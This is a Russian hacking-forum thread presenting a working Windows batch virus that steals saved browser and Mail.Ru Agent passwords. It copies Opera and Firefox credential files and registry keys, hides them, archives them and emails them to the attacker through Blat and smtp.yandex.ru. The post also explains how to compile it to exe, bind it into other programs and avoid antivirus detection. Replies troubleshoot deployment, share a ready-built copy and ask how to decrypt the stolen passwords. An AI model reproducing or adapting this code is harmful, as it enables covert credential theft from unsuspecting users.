Инструкция взлома - Это пособия для безопасности!

Объявление

Hash Profit

Хочешь получить WMR бонус? Вот несколько рабочих WMR бонус программ, которые раздают бонусы за посещение их сайтов по 0.77 р., мало но каждый день что стоит кликать на кнопку и получать свой бонус, сколько накапает к примеру за месяц, за год?
worldwm
5-kopeek
icqmir
1 клик 1 wmr
3.03WMB

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Инструкция взлома - Это пособия для безопасности! » Всё что касается вирусов. » Пример простого bat вируса,ворующего файлы с паролями.


Пример простого bat вируса,ворующего файлы с паролями.

Сообщений 1 страница 30 из 187

1

В этой статье опишу как можно быстро и без особого труда,написать и сделать вирус ворующий файлы с паролями и отправляющий всё это на почтовый ящик.
Начнём с того что вирус будет написан на bat'e(CMD,основные команды Вы можете взять здесь) то есть в обычном текстовом файле и будет выполняться при помощи стандартного,встроенного интреператора Windows- "командной строки".
Для того чтоб написать подобный вирус,нужно знать точное место хранения тех файлов которые и будет он воровать, компоненты Blat которые можно скачать с офф сайта  http://www.blat.net/ или же с нашего сервера,так же компонент от архиватора WinRaR Rar.exe(можно обойтись и без него).
Открываем блокнот и копируем туда следующий код:

Код:
@echo off 
md %systemroot%\wincs 
md %SystemDrive%\pass\
md %SystemDrive%\pass\opera\ 
md %SystemDrive%\pass\Mozilla\ 
md %SystemDrive%\pass\MailAgent\
md %SystemDrive%\pass\MailAgent\reg
attrib %systemroot%\wincs +h +s +r 
attrib %SystemDrive%\pass +h +s +r 
copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" 
copy /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" 
copy /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib"  
CD /D %APPDATA%\Opera\Opera\ 
copy /y wand.dat %SystemDrive%\pass\opera\wand.dat 
copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.da   
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3 
CD /D %APPDATA% 
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul 
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul 
cd %AppData%\Mozilla\Firefox\Profiles\*.default\ 
copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite  
copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db  
copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite  
copy /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul 
del /s /q %SystemRoot%\Rar.exe 
%SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\ 
copy /y  %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar 
cd %systemroot%\wincs 
%systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f логин@yandex.ru -u логин -pw Пароль 
ren *.rar pass.rar 
%systemroot%\wincs\blat.exe -body FilesPassword -to логин@yandex.ru -attach %systemroot%\wincs\pass.rar 
rmdir /s /q %SystemDrive%\pass 
rmdir /s /q %systemroot%\wincs 
del /s /q %systemroot%\blat.exe 
del /s /q %systemroot%\blat.dll 
del /s /q %systemroot%\blat.lib 
attrib +a +s +h +r %systemroot%\wind.exe
EXIT 
cls

Не много распишу код самого батинка.
@echo off - скрывает тело батинка( так то она и не нужна,ну всё же)
md %systemroot%\wincs - создаёт папку wincs в системной папке Windows не зависимо от того на каком диске она установлена или как она названа.
md %SystemDrive%\pass\ - создаёт папку pass на диске куда установлена система Windows.
md %SystemDrive%\pass\opera\ - создаёт папку opera куда в дальнейшем будет копироваться wand.dat и cookies4.dat от браузера Opera (до 11* версий опера хранит свои пароли в файле wand.dat )
md %SystemDrive%\pass\Mozilla\ - создаёт папку Mozilla куда в дальнейшем будут копироваться файлы от браузера Mozilla (cookies.sqlite,key3.db,signons.sqlite) в которых храняться пароли.
md %SystemDrive%\pass\MailAgent\ - создаёт папку MailAgent в которую будут копироваться файлы содержащие в себе историю переписки и ключи реестра( хранящие в себе пароли) от Маил Агента.
md %SystemDrive%\pass\MailAgent\reg - создаёт папку reg
attrib %systemroot%\wincs +h +s +r - ставит атрибуты на папку wincs тем самым скрывая её от глаз.
attrib %SystemDrive%\pass +h +s +r  - тоже самое что и выше.
copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" - копирует файл blat.exe с места выгрузки в папку wincs
copy /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" - копирует файл blat.dll с места выгрузки в папку wincs
copy /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib" - копирует файл blat.lib с места выгрузки в папку wincs
CD /D %APPDATA%\Opera\Opera\ - переходит в папку оперы где располагаются файлы с паролями ( и не только) от оперы.
copy /y wand.dat %SystemDrive%\pass\opera\wand.dat -  копирует файл wand.dat в папку opera
copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.dat  -  копирует файл cookies4.dat в папку opera
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 - экспортирует ключ реестра magent_logins2 где хранится пароль, в папку reg
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3 - экспортирует ключ реестра magent_logins3 где хранится пароль, в папку reg
CD /D %APPDATA% - переходим в папку AppData
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul - копирует содержимое папки Mra\Base в папку MailAgent
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul - копирует файл ver.txt в папку MailAgent
cd %AppData%\Mozilla\Firefox\Profiles\*.default\ - переходим в папку с профилем браузера Мозилы
copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite - копирует файл cookies.sqlite в папку Mozilla
copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db - копирует файл key3.db в папку Mozilla
copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite - копирует файл signons.sqlite в папку Mozilla
copy /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul - копирует компонент  архиватора WinRar Rar.exe в папку pass
del /s /q %SystemRoot%\Rar.exe - удаляет компонент архиватора из папки Windows
%SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\- архивируем содержимое папки pass
copy /y  %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar копируем созданный архив в папку wincs
cd %systemroot%\wincs - переходим в папку wincs
%systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f логин@yandex.ru -u логин -pw Пароль - готовит программу Blat к отправки архив указывая данные для авторизации и отправки письма.Не забудьте указать свои данные от почтового ящика,от куда будет отправляться письмо с архивом.
ren *.rar pass.rar - на всякий случай если архив в ходе не принял не правильное имя,мы его ещё раз переименуем в pass.rar
%systemroot%\wincs\blat.exe -body Files Password -to логин@yandex.ru -attach %systemroot%\wincs\pass.rar - указываем на какой почтовый адрес будет послано письмо и отсылаем его.
rmdir /s /q %SystemDrive%\pass - удаляем папку pass 
rmdir /s /q %systemroot%\wincs - удаляем папку wincs
del /s /q %systemroot%\blat.exe - удаляем компоненты Blat из папки Windows.
del /s /q %systemroot%\blat.dll - удаляем компоненты Blat из папки Windows.
del /s /q %systemroot%\blat.lib - удаляем компоненты Blat из папки Windows.
attrib +a +s +h +r %systemroot%\wind.exe - ставим на себя атрибуты тем самым скрываем себя от глаз.
EXIT - завершаем процесс батинка и выходим.
cls - очищаем вывод каких либо строк в интреператоре.
Скопировали,сохраняем как wind.bat и компилируем в exe при помощи программы Bat to exe converter (скачать) (о том как скомпилировать и не только можно прочитать здесь),далее собираем всё в кучу,то есть берём компоненты программы Blat и компонент архиватора WinRar (скачать можно здесь) и склеиваем в один исполняемый файл,или же с какой нибудь программой ( об этом можно прочитать здесь), путь выгрузки всех фалов должен быть %SystemRoot% или %WindowsDir% или %windir%.
В итоге мы получаем вирус который не будет палиться антивирусами и будет отправлять архив с файлами к Вам на почту.Файлы которые придут на почту,можно расшифровать с помощью программы,правда не все,а только wand.dat от оперы и то если её не обновляли до 11*версий.Все остальные файлы можно расшифровать заменив на свои.
На этом я думаю можно закончить,если же у Вас возникнут какие либо вопросы,не стесняйтесь задавайте.
Спасибо за внимание,всего доброго!

0

2

а как рашипровать пароль от майл агента

0

3

invulnerable есть прога : passwordspy она умеет расшифровывать алгаритм майла и не только,но вот кряка к ней пока что у меня нету.
Если найдёшь серийник и поделишся им, буду благодарен.

0

4

Здравствуйте я создал бат вирус для кражи паролей, но он почему то не работает, выскакивает во такая ошибка:An unknown error occured. The program will be terminated
Как её устранить?

0

5

жека Отключи антивирус и только потом компили bat в exe

0

6

Спасибо сей час попробую
----------------------------------------------------------
LyubitelПривет, у тебя есть скайп, или страничка Вконтакте?

0

7

Ты мне напомнил кое кого))) нет нету!

0

8

Эту ошибку исправил, но теперь при при нажатии на вирус он просто розархивирует все файлы которые в нём были, и на мыло ничего не приходит!

0

9

Запусти от имени Администратора

0

10

Не помогло, правда архив теперь не распаковывается, но пароли на мыло не приходят!
-----------------------------------------------------
Хотя нет, файлы всё так же роспаковуются!

0

11

жека ты путь распаковки не указал.
Вообщем читай внимательно,или смотри видео Самый простой Batch вирус ворующий файлы с паролями. внимательней.

0

12

Указал- %systemroot%

0

13

жека файлы распаковуются рядом с самораспаком?? если да то советую еще раз прочитать статью!

0

14

Всё перечитал, заново всё переделал, несколько раз проверил, не пашет(

0

15

жека если бы ты указал путь %systemRoot% то файлы не распаковывались рядом с архивом,сто пудов косяк в тебе,либо в голове либо в руках,а может быть и там и там сразу.

0

16

Нет у меня никакого косяка точно нету ни там не там!

0

17

жека подозреваю что ты просто стесняешься))
Посуди сам,у всех всё пашет,у тебя одно всё криво))
Это говорит о чём?
Это говорит о том что ты даже не в состояние скопипастить(тупа) с сдешней страницы  и потом всё это собрать.

На вот почётай,а вось поможет : Как склеивают вирусы с программами.

0

18

Читал я это, оно у меня не распаковывается там где архив, просто при нажатии ничего не происходит!А все по твоему я так понял-это ты и любитель?
А то что я собрал всё правильно в этом я уверен на 100%Здесь проблема далеко не во мне!!!!!!

0

19

жека написал(а):

А все по твоему я так понял-это ты и любитель?

Расшифруй.

жека написал(а):

А то что я собрал всё правильно в этом я уверен на 100%

Чёт как то сомневаюсь))

жека написал(а):

Здесь проблема далеко не во мне!!!!!!

Чёт ещё больше стал сомневаться))
Ни чего и не должно происходить,тупа ты ни чего и не должен увидеть,только после того как батинок закончит свою работу к тебе прилетит архив с файлами.
Внимательней вчитайся,проверь может ты не вписал данные от мыла(логин и пароль от ящика),потом есть такой вариант что свежезареганные ящики на яндексе не катят,пробуй использовать не яндекс а к примеру маил.
Ну сто пудов что трабла в тебе,это видно с первого твоего сообщения.

0

20

Это я понимаю что после окончания работы вируса должно прийти сообщение на мыло с архивом, под словами-"ничего не происходит" я имею введу что это сообщение мне не приходит!Логин и пароль от мыла я вписал, и так уже несколько раз проверял!На счот того что свежие ящики не катят сомневаюсь, поскольку я собрал другой троян(с вашего форума-http://thehackword.ru/viewtopic.php?id=410), и указал там теже данные от мыла что и в батнике, и сообщения приходят!

0

21

жека ох мля))
кинь своё данные от ящика,смысле логин и пароль,второй ящик просто логин,куда будет лететь всё это,сча я вирту запущу да заляпаю тебе вируса.

0

22

Хотя не надо,счас среди других найду.

0

23

жека лови в архвие уже готовый(в папке) скомпилированный и не скомпилированный батинок,все необходимые компоненты и конвертер(так на всякий случай) и не говори что трабла не в тебе!)
Логин и пароль от ящика в батинке,там даже тебе подарок 5р. на счету))

0

24

Да всё работает, наверное у меня с архиватором что то ни то)

0

25

жека да ладно,что ты стесняешься?)
Не стесняйся,архиватор тут не причём)))

0

26

Да ладно реально признаю что возможно это моя в чём то ошибка, я её сей час пытаюсь найти, слушай а я заметил что в свойствах у твоего wind.exe нету отдела-"версия", а в моём есть, есть ли какая нибуть разница в этом?

0

27

жека абсолютно ни какой)
Просто на скорую компилил и ни чего туда не вписывал,тут трабла не из за этого.

0

28

Я понял, спасибо!!!!!!Буду дальше искать)

0

29

КАк расшифровать пароль от майла агента?

0

30

Almaz88 Глаза подыми.

0


Вы здесь » Инструкция взлома - Это пособия для безопасности! » Всё что касается вирусов. » Пример простого bat вируса,ворующего файлы с паролями.